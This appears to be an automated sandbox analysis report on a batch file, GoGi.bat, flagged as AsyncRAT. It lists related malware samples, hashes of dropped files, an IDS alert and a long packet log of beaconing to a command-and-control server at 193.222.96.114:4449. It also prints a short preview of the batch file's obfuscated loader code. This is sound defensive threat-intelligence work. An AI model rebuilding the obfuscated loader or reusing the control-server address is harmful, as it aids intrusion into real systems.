Get hash | malicious | Unknown | Browse |
| ||
Get hash | malicious | PayPal Phisher | Browse |
| ||
Get hash | malicious | Unknown | Browse |
| ||
Get hash | malicious | TechSupportScam | Browse |
| ||
Get hash | malicious | TechSupportScam | Browse |
| ||
Get hash | malicious | TechSupportScam | Browse |
| ||
Get hash | malicious | TechSupportScam | Browse |
| ||
Get hash | malicious | TechSupportScam | Browse |
|
Match | Associated Sample Name / URL | SHA 256 | Detection | Threat Name | Link | Context |
---|---|---|---|---|---|---|
SWISSCOMSwisscomSwitzerlandLtdCH | Get hash | malicious | Unknown | Browse |
| |
Get hash | malicious | AgentTesla, PureLog Stealer, zgRAT | Browse |
| ||
Get hash | malicious | HTMLPhisher | Browse |
| ||
Get hash | malicious | GuLoader, Remcos | Browse |
| ||
Get hash | malicious | GuLoader, Remcos | Browse |
| ||
Get hash | malicious | GuLoader, Remcos | Browse |
| ||
Get hash | malicious | Mirai | Browse |
| ||
Get hash | malicious | GuLoader, Remcos | Browse |
| ||
Get hash | malicious | HTMLPhisher | Browse |
| ||
Get hash | malicious | Mirai | Browse |
|
C:\Users\user\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\77EC63BDA74BD0D0E0426DC8F8008506
Download File
Process: | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 69993 |
Entropy (8bit): | 7.99584879649948 |
Encrypted: | true |
SSDEEP: | 1536:iMveRG6BWC7T2g1wGUa5QUoaIB9ttiFJG+AOQOXl0Usvwr:feRG6BX6gUaHo9tkBHiUewr |
MD5: | 29F65BA8E88C063813CC50A4EA544E93 |
SHA1: | 05A7040D5C127E68C25D81CC51271FFB8BEF3568 |
SHA-256: | 1ED81FA8DFB6999A9FEDC6E779138FFD99568992E22D300ACD181A6D2C8DE184 |
SHA-512: | E29B2E92C496245BED3372578074407E8EF8882906CE10C35B3C8DEEBFEFE01B5FD7F3030ACAA693E175F4B7ACA6CD7D8D10AE1C731B09C5FA19035E005DE3AA |
Malicious: | false |
Reputation: | moderate, very likely benign file |
Preview: |
C:\Users\user\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\77EC63BDA74BD0D0E0426DC8F8008506
Download File
Process: | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 330 |
Entropy (8bit): | 3.1475546137593846 |
Encrypted: | false |
SSDEEP: | 6:kKZYlDN+SkQlPlEGYRMY9z+4KlDA3RUeVlWI/Vt:6lMkPlE99SNxAhUeVLVt |
MD5: | 690C13DB3A1B943B8692E4C6D1966A5D |
SHA1: | B1275A0B1440232E8BED13A0BB51C7FBA2AF9809 |
SHA-256: | 36B03E949625C785558661A1AB38B9F0BE88F5DEF6068255623C16E73F1D621F |
SHA-512: | EAF48AD1AA817180FFE3DA248F5551251DCB53EF5D3A7E99278537AFF30E6FD1AAC8B7B7CC85CE8C072838DA59480F145BAE1D6DA605AE838704345D80E86F7F |
Malicious: | false |
Reputation: | low |
Preview: |
Process: | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 9713 |
Entropy (8bit): | 4.93568648418653 |
Encrypted: | false |
SSDEEP: | 192:Pxoe5lpOdxoe56ib49Vsm5emdagkjDt4iWN3yBGHB9smMdcU6CBdcU6Ch9smwY1D:lVib49Vkjh4iUxlYvcYKib4o |
MD5: | A7EDDF0DCC37957ABAFE63CE6D0BE4CA |
SHA1: | 5B09680EF1C3C405D698481E1364BE0C412C7A9C |
SHA-256: | B9F314DC6C4DDB176CB92C77ECB5FCA91FB58FBE12DCFD9CEB4E8BFFC07B5327 |
SHA-512: | A906C8FFAB88AD0CEAD9A5B4D7D4089C1621A8D36F7190EF6FD829B0D942BBBC89E76424C46E204282B6985C02ABD3488082A6A2A4D88CDE396C480E2989AF73 |
Malicious: | false |
Reputation: | moderate, very likely benign file |
Preview: |
C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-Interactive
Download File
Process: | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 2832 |
Entropy (8bit): | 5.414030276061799 |
Encrypted: | false |
SSDEEP: | 48:0AzsSU4YymI4RIoUeCa+m9qr9t5/78NV4GxJZKaVEouYAgwd64rHLjtvz:0AzlHYvIIfLz9qrh7KrJ5Eo9Adrxz |
MD5: | BAF5A10C59FD93E444E5B672D7CCB1D4 |
SHA1: | 906BB875AB47D641756F44E09633F75AFDDDD638 |
SHA-256: | B029CB8CEA8D97BF6F636D2BE3F7A0F3334A07E22B832581A3D1D1F282AFC637 |
SHA-512: | B52A2F66B83271814381F897CD32B83ED97F18553EEDB8DDABE99B93EAF58C46A362E6255B0744C41C5E91042238E15ED9E4CF46C11446937B850F104965087A |
Malicious: | false |
Reputation: | low |
Preview: |
Process: | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 60 |
Entropy (8bit): | 4.038920595031593 |
Encrypted: | false |
SSDEEP: | 3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX |
MD5: | D17FE0A3F47BE24A6453E9EF58C94641 |
SHA1: | 6AB83620379FC69F80C0242105DDFFD7D98D5D9D |
SHA-256: | 96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7 |
SHA-512: | 5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82 |
Malicious: | false |
Reputation: | high, very likely benign file |
Preview: |
Process: | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 60 |
Entropy (8bit): | 4.038920595031593 |
Encrypted: | false |
SSDEEP: | 3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX |
MD5: | D17FE0A3F47BE24A6453E9EF58C94641 |
SHA1: | 6AB83620379FC69F80C0242105DDFFD7D98D5D9D |
SHA-256: | 96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7 |
SHA-512: | 5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82 |
Malicious: | false |
Preview: |
Process: | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 60 |
Entropy (8bit): | 4.038920595031593 |
Encrypted: | false |
SSDEEP: | 3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX |
MD5: | D17FE0A3F47BE24A6453E9EF58C94641 |
SHA1: | 6AB83620379FC69F80C0242105DDFFD7D98D5D9D |
SHA-256: | 96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7 |
SHA-512: | 5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82 |
Malicious: | false |
Preview: |
Process: | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 60 |
Entropy (8bit): | 4.038920595031593 |
Encrypted: | false |
SSDEEP: | 3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX |
MD5: | D17FE0A3F47BE24A6453E9EF58C94641 |
SHA1: | 6AB83620379FC69F80C0242105DDFFD7D98D5D9D |
SHA-256: | 96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7 |
SHA-512: | 5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82 |
Malicious: | false |
Preview: |
Process: | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 8 |
Entropy (8bit): | 2.75 |
Encrypted: | false |
SSDEEP: | 3:Rt:v |
MD5: | CF759E4C5F14FE3EEC41B87ED756CEA8 |
SHA1: | C27C796BB3C2FAC929359563676F4BA1FFADA1F5 |
SHA-256: | C9F9F193409217F73CC976AD078C6F8BF65D3AABCF5FAD3E5A47536D47AA6761 |
SHA-512: | C7F832AEE13A5EB36D145F35D4464374A9E12FA2017F3C2257442D67483B35A55ECCAE7F7729243350125B37033E075EFBC2303839FD86B81B9B4DCA3626953B |
Malicious: | false |
Preview: |
Process: | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 2139 |
Entropy (8bit): | 5.7781485718880985 |
Encrypted: | false |
SSDEEP: | 48:O2onXBS0NmhNrdR2Rd2Rxf8BmBYFSznk/kBJn3rGcTJsGcmtKWz:O5xSPh5dg+7f8BmBYFSzFx36cdHcmz |
MD5: | 39D538F12866D931EF35929072C94ED2 |
SHA1: | 2A93488CA62A6F0F5F3570D6784BF7D570D598EC |
SHA-256: | 85536DA18EA005ADF721A739D6D07FBB2AD39AE3423ECD79F7D3CD58EB4F10E9 |
SHA-512: | D5FA366B516C111693E6FDAE02E1A43CCF9B01CE138E1836D04D949DA2986A7AC948B5BDACE548F298276D5264946C60FCE9136183D1A6DFF1F9E2E94FA1B58A |
Malicious: | false |
Preview: |
File type: | |
Entropy (8bit): | 5.999975112908781 |
TrID: | |
File name: | GoGi.bat |
File size: | 62'296 bytes |
MD5: | cab2108a81d68104dd9b15efcedf8351 |
SHA1: | 03852c18f75cad87f71693fb1973d9a04e8910ed |
SHA256: | a2dfe970dc385f9aa1a81946c4bc41144d182dbddb02e37ce4c5b52c9b884aaa |
SHA512: | e474ce03766f8e21fdb14e072144e8e1c5fa1f30e66ea4f7a05fade86bd783fb4dec65d23ab01861524959a0a029cb2112074116fdbd72d02ab4794216ed95f5 |
SSDEEP: | 1536:ts4yFTt4kNLNofpmw3dU7pVcJqmJQBULYJebJaRVmMWVXUpQk8daktj2aVv0+x/:tITGkDofH27pAD8YdYFpQk88kd2aJ/x/ |
TLSH: | 4653E0B15E3D7ADB73CA53E08E7CBE95CC40316E6AC1129B1BC43A284A9CF499E0F051 |
File Content Preview: | @echo off..set "tPxaUE=setztepY sjztepYCJztepY=1ztepY &ztepY& ztepYsztepYtaztepYrt ztepY"ztepY" /ztepYmztepYinztepY ztepY"..set "JHuzvA=&& ztepYexiztepYtztepY"..set "sWWmDL=nztepYotztepY dztepYefiztepYneztepYd ztepYsjztepYCJztepY..if %sWWmDL:ztepY=% (%tPx |
Icon Hash: | 9686878b929a9886 |
Timestamp | Protocol | SID | Message | Source Port | Dest Port | Source IP | Dest IP |
---|---|---|---|---|---|---|---|
04/20/24-10:18:04.027368 | TCP | 2850454 | ETPRO TROJAN Observed Malicious SSL Cert (AsyncRAT) | 4449 | 49730 | 193.222.96.114 | 192.168.2.4 |
Timestamp | Source Port | Dest Port | Source IP | Dest IP |
---|---|---|---|---|
Apr 20, 2024 10:18:03.615164995 CEST | 49730 | 4449 | 192.168.2.4 | 193.222.96.114 |
Apr 20, 2024 10:18:03.814419031 CEST | 4449 | 49730 | 193.222.96.114 | 192.168.2.4 |
Apr 20, 2024 10:18:03.814536095 CEST | 49730 | 4449 | 192.168.2.4 | 193.222.96.114 |
Apr 20, 2024 10:18:03.821696043 CEST | 49730 | 4449 | 192.168.2.4 | 193.222.96.114 |
Apr 20, 2024 10:18:04.027368069 CEST | 4449 | 49730 | 193.222.96.114 | 192.168.2.4 |
Apr 20, 2024 10:18:04.033051014 CEST | 49730 | 4449 | 192.168.2.4 | 193.222.96.114 |
Apr 20, 2024 10:18:04.234569073 CEST | 4449 | 49730 | 193.222.96.114 | 192.168.2.4 |
Apr 20, 2024 10:18:04.275921106 CEST | 49730 | 4449 | 192.168.2.4 | 193.222.96.114 |
Apr 20, 2024 10:18:05.163355112 CEST | 49730 | 4449 | 192.168.2.4 | 193.222.96.114 |
Apr 20, 2024 10:18:05.408771992 CEST | 4449 | 49730 | 193.222.96.114 | 192.168.2.4 |
Apr 20, 2024 10:18:05.408855915 CEST | 49730 | 4449 | 192.168.2.4 | 193.222.96.114 |
Apr 20, 2024 10:18:05.658771038 CEST | 4449 | 49730 | 193.222.96.114 | 192.168.2.4 |
Apr 20, 2024 10:18:19.871148109 CEST | 49730 | 4449 | 192.168.2.4 | 193.222.96.114 |
Apr 20, 2024 10:18:20.112046957 CEST | 4449 | 49730 | 193.222.96.114 | 192.168.2.4 |
Apr 20, 2024 10:18:20.112257957 CEST | 49730 | 4449 | 192.168.2.4 | 193.222.96.114 |
Apr 20, 2024 10:18:20.312922001 CEST | 4449 | 49730 | 193.222.96.114 | 192.168.2.4 |
Apr 20, 2024 10:18:20.353951931 CEST | 49730 | 4449 | 192.168.2.4 | 193.222.96.114 |
Apr 20, 2024 10:18:20.553388119 CEST | 4449 | 49730 | 193.222.96.114 | 192.168.2.4 |
Apr 20, 2024 10:18:20.563235044 CEST | 49730 | 4449 | 192.168.2.4 | 193.222.96.114 |
Apr 20, 2024 10:18:20.815227032 CEST | 4449 | 49730 | 193.222.96.114 | 192.168.2.4 |
Apr 20, 2024 10:18:20.815350056 CEST | 49730 | 4449 | 192.168.2.4 | 193.222.96.114 |
Apr 20, 2024 10:18:21.065100908 CEST | 4449 | 49730 | 193.222.96.114 | 192.168.2.4 |
Apr 20, 2024 10:18:34.588754892 CEST | 49730 | 4449 | 192.168.2.4 | 193.222.96.114 |
Apr 20, 2024 10:18:34.830734968 CEST | 4449 | 49730 | 193.222.96.114 | 192.168.2.4 |
Apr 20, 2024 10:18:34.830935955 CEST | 49730 | 4449 | 192.168.2.4 | 193.222.96.114 |
Apr 20, 2024 10:18:35.031852961 CEST | 4449 | 49730 | 193.222.96.114 | 192.168.2.4 |
Apr 20, 2024 10:18:35.072849989 CEST | 49730 | 4449 | 192.168.2.4 | 193.222.96.114 |
Apr 20, 2024 10:18:35.272197008 CEST | 4449 | 49730 | 193.222.96.114 | 192.168.2.4 |
Apr 20, 2024 10:18:35.275706053 CEST | 49730 | 4449 | 192.168.2.4 | 193.222.96.114 |
Apr 20, 2024 10:18:35.518089056 CEST | 4449 | 49730 | 193.222.96.114 | 192.168.2.4 |
Apr 20, 2024 10:18:35.518371105 CEST | 49730 | 4449 | 192.168.2.4 | 193.222.96.114 |
Apr 20, 2024 10:18:35.768213034 CEST | 4449 | 49730 | 193.222.96.114 | 192.168.2.4 |
Apr 20, 2024 10:18:49.307337999 CEST | 49730 | 4449 | 192.168.2.4 | 193.222.96.114 |
Apr 20, 2024 10:18:49.549393892 CEST | 4449 | 49730 | 193.222.96.114 | 192.168.2.4 |
Apr 20, 2024 10:18:49.549500942 CEST | 49730 | 4449 | 192.168.2.4 | 193.222.96.114 |
Apr 20, 2024 10:18:49.749908924 CEST | 4449 | 49730 | 193.222.96.114 | 192.168.2.4 |
Apr 20, 2024 10:18:49.791435957 CEST | 49730 | 4449 | 192.168.2.4 | 193.222.96.114 |
Apr 20, 2024 10:18:49.990715027 CEST | 4449 | 49730 | 193.222.96.114 | 192.168.2.4 |
Apr 20, 2024 10:18:49.992552996 CEST | 49730 | 4449 | 192.168.2.4 | 193.222.96.114 |
Apr 20, 2024 10:18:50.236711025 CEST | 4449 | 49730 | 193.222.96.114 | 192.168.2.4 |
Apr 20, 2024 10:18:50.236802101 CEST | 49730 | 4449 | 192.168.2.4 | 193.222.96.114 |
Apr 20, 2024 10:18:50.486635923 CEST | 4449 | 49730 | 193.222.96.114 | 192.168.2.4 |
Apr 20, 2024 10:19:04.026103973 CEST | 49730 | 4449 | 192.168.2.4 | 193.222.96.114 |
Apr 20, 2024 10:19:04.267946959 CEST | 4449 | 49730 | 193.222.96.114 | 192.168.2.4 |
Apr 20, 2024 10:19:04.268060923 CEST | 49730 | 4449 | 192.168.2.4 | 193.222.96.114 |
Apr 20, 2024 10:19:04.468741894 CEST | 4449 | 49730 | 193.222.96.114 | 192.168.2.4 |
Apr 20, 2024 10:19:04.510215998 CEST | 49730 | 4449 | 192.168.2.4 | 193.222.96.114 |
Apr 20, 2024 10:19:04.709273100 CEST | 4449 | 49730 | 193.222.96.114 | 192.168.2.4 |
Apr 20, 2024 10:19:04.710752010 CEST | 49730 | 4449 | 192.168.2.4 | 193.222.96.114 |
Apr 20, 2024 10:19:04.955555916 CEST | 4449 | 49730 | 193.222.96.114 | 192.168.2.4 |
Apr 20, 2024 10:19:04.955643892 CEST | 49730 | 4449 | 192.168.2.4 | 193.222.96.114 |
Apr 20, 2024 10:19:05.205774069 CEST | 4449 | 49730 | 193.222.96.114 | 192.168.2.4 |
Apr 20, 2024 10:19:11.666806936 CEST | 49730 | 4449 | 192.168.2.4 | 193.222.96.114 |
Apr 20, 2024 10:19:11.908811092 CEST | 4449 | 49730 | 193.222.96.114 | 192.168.2.4 |
Apr 20, 2024 10:19:11.908878088 CEST | 49730 | 4449 | 192.168.2.4 | 193.222.96.114 |
Apr 20, 2024 10:19:12.110089064 CEST | 4449 | 49730 | 193.222.96.114 | 192.168.2.4 |
Apr 20, 2024 10:19:12.150804996 CEST | 49730 | 4449 | 192.168.2.4 | 193.222.96.114 |
Apr 20, 2024 10:19:12.350780964 CEST | 4449 | 49730 | 193.222.96.114 | 192.168.2.4 |
Apr 20, 2024 10:19:12.352478981 CEST | 49730 | 4449 | 192.168.2.4 | 193.222.96.114 |
Apr 20, 2024 10:19:12.596307039 CEST | 4449 | 49730 | 193.222.96.114 | 192.168.2.4 |
Apr 20, 2024 10:19:12.596368074 CEST | 49730 | 4449 | 192.168.2.4 | 193.222.96.114 |
Apr 20, 2024 10:19:12.846132994 CEST | 4449 | 49730 | 193.222.96.114 | 192.168.2.4 |
Apr 20, 2024 10:19:22.557532072 CEST | 49730 | 4449 | 192.168.2.4 | 193.222.96.114 |
Apr 20, 2024 10:19:22.799189091 CEST | 4449 | 49730 | 193.222.96.114 | 192.168.2.4 |
Apr 20, 2024 10:19:22.799276114 CEST | 49730 | 4449 | 192.168.2.4 | 193.222.96.114 |
Apr 20, 2024 10:19:23.002378941 CEST | 4449 | 49730 | 193.222.96.114 | 192.168.2.4 |
Apr 20, 2024 10:19:23.057070971 CEST | 49730 | 4449 | 192.168.2.4 | 193.222.96.114 |
Apr 20, 2024 10:19:23.256331921 CEST | 4449 | 49730 | 193.222.96.114 | 192.168.2.4 |
Apr 20, 2024 10:19:23.264717102 CEST | 49730 | 4449 | 192.168.2.4 | 193.222.96.114 |
Apr 20, 2024 10:19:23.517878056 CEST | 4449 | 49730 | 193.222.96.114 | 192.168.2.4 |
Apr 20, 2024 10:19:23.519745111 CEST | 49730 | 4449 | 192.168.2.4 | 193.222.96.114 |
Apr 20, 2024 10:19:23.767826080 CEST | 4449 | 49730 | 193.222.96.114 | 192.168.2.4 |
Apr 20, 2024 10:19:36.588901997 CEST | 49730 | 4449 | 192.168.2.4 | 193.222.96.114 |
Apr 20, 2024 10:19:36.830914021 CEST | 4449 | 49730 | 193.222.96.114 | 192.168.2.4 |
Apr 20, 2024 10:19:36.830995083 CEST | 49730 | 4449 | 192.168.2.4 | 193.222.96.114 |
Apr 20, 2024 10:19:37.031797886 CEST | 4449 | 49730 | 193.222.96.114 | 192.168.2.4 |
Apr 20, 2024 10:19:37.091718912 CEST | 49730 | 4449 | 192.168.2.4 | 193.222.96.114 |
Apr 20, 2024 10:19:37.294053078 CEST | 4449 | 49730 | 193.222.96.114 | 192.168.2.4 |
Apr 20, 2024 10:19:37.302164078 CEST | 49730 | 4449 | 192.168.2.4 | 193.222.96.114 |
Apr 20, 2024 10:19:37.565788031 CEST | 4449 | 49730 | 193.222.96.114 | 192.168.2.4 |
Apr 20, 2024 10:19:37.567773104 CEST | 49730 | 4449 | 192.168.2.4 | 193.222.96.114 |
Apr 20, 2024 10:19:37.774029970 CEST | 4449 | 49730 | 193.222.96.114 | 192.168.2.4 |
Apr 20, 2024 10:19:37.825725079 CEST | 49730 | 4449 | 192.168.2.4 | 193.222.96.114 |
Apr 20, 2024 10:19:38.024827957 CEST | 4449 | 49730 | 193.222.96.114 | 192.168.2.4 |
Apr 20, 2024 10:19:38.031727076 CEST | 49730 | 4449 | 192.168.2.4 | 193.222.96.114 |
Apr 20, 2024 10:19:38.298969030 CEST | 4449 | 49730 | 193.222.96.114 | 192.168.2.4 |
Apr 20, 2024 10:19:38.299038887 CEST | 49730 | 4449 | 192.168.2.4 | 193.222.96.114 |
Apr 20, 2024 10:19:38.549369097 CEST | 4449 | 49730 | 193.222.96.114 | 192.168.2.4 |
Apr 20, 2024 10:19:41.779727936 CEST | 49730 | 4449 | 192.168.2.4 | 193.222.96.114 |
Apr 20, 2024 10:19:42.033808947 CEST | 4449 | 49730 | 193.222.96.114 | 192.168.2.4 |
Apr 20, 2024 10:19:42.034018993 CEST | 49730 | 4449 | 192.168.2.4 | 193.222.96.114 |
Apr 20, 2024 10:19:42.235289097 CEST | 4449 | 49730 | 193.222.96.114 | 192.168.2.4 |
Apr 20, 2024 10:19:42.275832891 CEST | 49730 | 4449 | 192.168.2.4 | 193.222.96.114 |
Apr 20, 2024 10:19:42.475251913 CEST | 4449 | 49730 | 193.222.96.114 | 192.168.2.4 |
Apr 20, 2024 10:19:42.477235079 CEST | 49730 | 4449 | 192.168.2.4 | 193.222.96.114 |
Apr 20, 2024 10:19:42.721179962 CEST | 4449 | 49730 | 193.222.96.114 | 192.168.2.4 |
Apr 20, 2024 10:19:42.721260071 CEST | 49730 | 4449 | 192.168.2.4 | 193.222.96.114 |
Apr 20, 2024 10:19:42.971373081 CEST | 4449 | 49730 | 193.222.96.114 | 192.168.2.4 |
Apr 20, 2024 10:19:42.971451044 CEST | 49730 | 4449 | 192.168.2.4 | 193.222.96.114 |
Apr 20, 2024 10:19:43.172864914 CEST | 4449 | 49730 | 193.222.96.114 | 192.168.2.4 |
Apr 20, 2024 10:19:43.214117050 CEST | 49730 | 4449 | 192.168.2.4 | 193.222.96.114 |
Apr 20, 2024 10:19:43.412944078 CEST | 4449 | 49730 | 193.222.96.114 | 192.168.2.4 |
Apr 20, 2024 10:19:43.414868116 CEST | 49730 | 4449 | 192.168.2.4 | 193.222.96.114 |
Apr 20, 2024 10:19:43.658490896 CEST | 4449 | 49730 | 193.222.96.114 | 192.168.2.4 |
Apr 20, 2024 10:19:43.659795046 CEST | 49730 | 4449 | 192.168.2.4 | 193.222.96.114 |
Apr 20, 2024 10:19:43.908442020 CEST | 4449 | 49730 | 193.222.96.114 | 192.168.2.4 |
Apr 20, 2024 10:19:57.526086092 CEST | 49730 | 4449 | 192.168.2.4 | 193.222.96.114 |
Apr 20, 2024 10:19:57.767800093 CEST | 4449 | 49730 | 193.222.96.114 | 192.168.2.4 |
Apr 20, 2024 10:19:57.767875910 CEST | 49730 | 4449 | 192.168.2.4 | 193.222.96.114 |
Apr 20, 2024 10:19:57.968595028 CEST | 4449 | 49730 | 193.222.96.114 | 192.168.2.4 |
Apr 20, 2024 10:19:58.010194063 CEST | 49730 | 4449 | 192.168.2.4 | 193.222.96.114 |
Apr 20, 2024 10:19:58.209873915 CEST | 4449 | 49730 | 193.222.96.114 | 192.168.2.4 |
Apr 20, 2024 10:19:58.212950945 CEST | 49730 | 4449 | 192.168.2.4 | 193.222.96.114 |
Apr 20, 2024 10:19:58.455215931 CEST | 4449 | 49730 | 193.222.96.114 | 192.168.2.4 |
Apr 20, 2024 10:19:58.455730915 CEST | 49730 | 4449 | 192.168.2.4 | 193.222.96.114 |
Apr 20, 2024 10:19:58.705383062 CEST | 4449 | 49730 | 193.222.96.114 | 192.168.2.4 |
Apr 20, 2024 10:20:12.245081902 CEST | 49730 | 4449 | 192.168.2.4 | 193.222.96.114 |
Apr 20, 2024 10:20:12.486665964 CEST | 4449 | 49730 | 193.222.96.114 | 192.168.2.4 |
Apr 20, 2024 10:20:12.486741066 CEST | 49730 | 4449 | 192.168.2.4 | 193.222.96.114 |
Apr 20, 2024 10:20:12.687424898 CEST | 4449 | 49730 | 193.222.96.114 | 192.168.2.4 |
Apr 20, 2024 10:20:12.728933096 CEST | 49730 | 4449 | 192.168.2.4 | 193.222.96.114 |
Apr 20, 2024 10:20:12.929799080 CEST | 4449 | 49730 | 193.222.96.114 | 192.168.2.4 |
Apr 20, 2024 10:20:12.931580067 CEST | 49730 | 4449 | 192.168.2.4 | 193.222.96.114 |
Apr 20, 2024 10:20:13.174305916 CEST | 4449 | 49730 | 193.222.96.114 | 192.168.2.4 |
Apr 20, 2024 10:20:13.179747105 CEST | 49730 | 4449 | 192.168.2.4 | 193.222.96.114 |
Apr 20, 2024 10:20:13.424252033 CEST | 4449 | 49730 | 193.222.96.114 | 192.168.2.4 |
Apr 20, 2024 10:20:13.619841099 CEST | 49730 | 4449 | 192.168.2.4 | 193.222.96.114 |
Apr 20, 2024 10:20:13.861746073 CEST | 4449 | 49730 | 193.222.96.114 | 192.168.2.4 |
Apr 20, 2024 10:20:13.862263918 CEST | 49730 | 4449 | 192.168.2.4 | 193.222.96.114 |
Apr 20, 2024 10:20:14.068340063 CEST | 4449 | 49730 | 193.222.96.114 | 192.168.2.4 |
Apr 20, 2024 10:20:14.119586945 CEST | 49730 | 4449 | 192.168.2.4 | 193.222.96.114 |
Apr 20, 2024 10:20:14.318921089 CEST | 4449 | 49730 | 193.222.96.114 | 192.168.2.4 |
Apr 20, 2024 10:20:14.320976019 CEST | 49730 | 4449 | 192.168.2.4 | 193.222.96.114 |
Apr 20, 2024 10:20:14.564934969 CEST | 4449 | 49730 | 193.222.96.114 | 192.168.2.4 |
Apr 20, 2024 10:20:14.564996004 CEST | 49730 | 4449 | 192.168.2.4 | 193.222.96.114 |
Apr 20, 2024 10:20:14.817154884 CEST | 4449 | 49730 | 193.222.96.114 | 192.168.2.4 |
Apr 20, 2024 10:20:19.916686058 CEST | 49730 | 4449 | 192.168.2.4 | 193.222.96.114 |
Apr 20, 2024 10:20:20.158382893 CEST | 4449 | 49730 | 193.222.96.114 | 192.168.2.4 |
Apr 20, 2024 10:20:20.158457041 CEST | 49730 | 4449 | 192.168.2.4 | 193.222.96.114 |
Apr 20, 2024 10:20:20.358746052 CEST | 4449 | 49730 | 193.222.96.114 | 192.168.2.4 |
Apr 20, 2024 10:20:20.400825977 CEST | 49730 | 4449 | 192.168.2.4 | 193.222.96.114 |
Apr 20, 2024 10:20:20.599632978 CEST | 4449 | 49730 | 193.222.96.114 | 192.168.2.4 |
Apr 20, 2024 10:20:20.601475954 CEST | 49730 | 4449 | 192.168.2.4 | 193.222.96.114 |
Apr 20, 2024 10:20:20.845763922 CEST | 4449 | 49730 | 193.222.96.114 | 192.168.2.4 |
Apr 20, 2024 10:20:20.846365929 CEST | 49730 | 4449 | 192.168.2.4 | 193.222.96.114 |
Apr 20, 2024 10:20:21.095868111 CEST | 4449 | 49730 | 193.222.96.114 | 192.168.2.4 |
Apr 20, 2024 10:20:25.979157925 CEST | 49730 | 4449 | 192.168.2.4 | 193.222.96.114 |
Apr 20, 2024 10:20:26.221091032 CEST | 4449 | 49730 | 193.222.96.114 | 192.168.2.4 |
Apr 20, 2024 10:20:26.221184015 CEST | 49730 | 4449 | 192.168.2.4 | 193.222.96.114 |
Apr 20, 2024 10:20:26.425781965 CEST | 4449 | 49730 | 193.222.96.114 | 192.168.2.4 |
Apr 20, 2024 10:20:26.478946924 CEST | 49730 | 4449 | 192.168.2.4 | 193.222.96.114 |
Apr 20, 2024 10:20:26.678265095 CEST | 4449 | 49730 | 193.222.96.114 | 192.168.2.4 |
Apr 20, 2024 10:20:26.680150032 CEST | 49730 | 4449 | 192.168.2.4 | 193.222.96.114 |
Apr 20, 2024 10:20:26.924226999 CEST | 4449 | 49730 | 193.222.96.114 | 192.168.2.4 |
Apr 20, 2024 10:20:26.924302101 CEST | 49730 | 4449 | 192.168.2.4 | 193.222.96.114 |
Apr 20, 2024 10:20:27.174348116 CEST | 4449 | 49730 | 193.222.96.114 | 192.168.2.4 |
Apr 20, 2024 10:20:29.779697895 CEST | 49730 | 4449 | 192.168.2.4 | 193.222.96.114 |
Apr 20, 2024 10:20:30.033683062 CEST | 4449 | 49730 | 193.222.96.114 | 192.168.2.4 |
Apr 20, 2024 10:20:30.039678097 CEST | 49730 | 4449 | 192.168.2.4 | 193.222.96.114 |
Apr 20, 2024 10:20:30.240197897 CEST | 4449 | 49730 | 193.222.96.114 | 192.168.2.4 |
Apr 20, 2024 10:20:30.291467905 CEST | 49730 | 4449 | 192.168.2.4 | 193.222.96.114 |
Apr 20, 2024 10:20:30.490618944 CEST | 4449 | 49730 | 193.222.96.114 | 192.168.2.4 |
Apr 20, 2024 10:20:30.493357897 CEST | 49730 | 4449 | 192.168.2.4 | 193.222.96.114 |
Apr 20, 2024 10:20:30.737617016 CEST | 4449 | 49730 | 193.222.96.114 | 192.168.2.4 |
Apr 20, 2024 10:20:30.737680912 CEST | 49730 | 4449 | 192.168.2.4 | 193.222.96.114 |
Apr 20, 2024 10:20:30.986681938 CEST | 4449 | 49730 | 193.222.96.114 | 192.168.2.4 |
Apr 20, 2024 10:20:36.932312965 CEST | 49730 | 4449 | 192.168.2.4 | 193.222.96.114 |
Apr 20, 2024 10:20:37.174084902 CEST | 4449 | 49730 | 193.222.96.114 | 192.168.2.4 |
Apr 20, 2024 10:20:37.174268961 CEST | 49730 | 4449 | 192.168.2.4 | 193.222.96.114 |
Apr 20, 2024 10:20:37.374916077 CEST | 4449 | 49730 | 193.222.96.114 | 192.168.2.4 |
Apr 20, 2024 10:20:37.418203115 CEST | 49730 | 4449 | 192.168.2.4 | 193.222.96.114 |
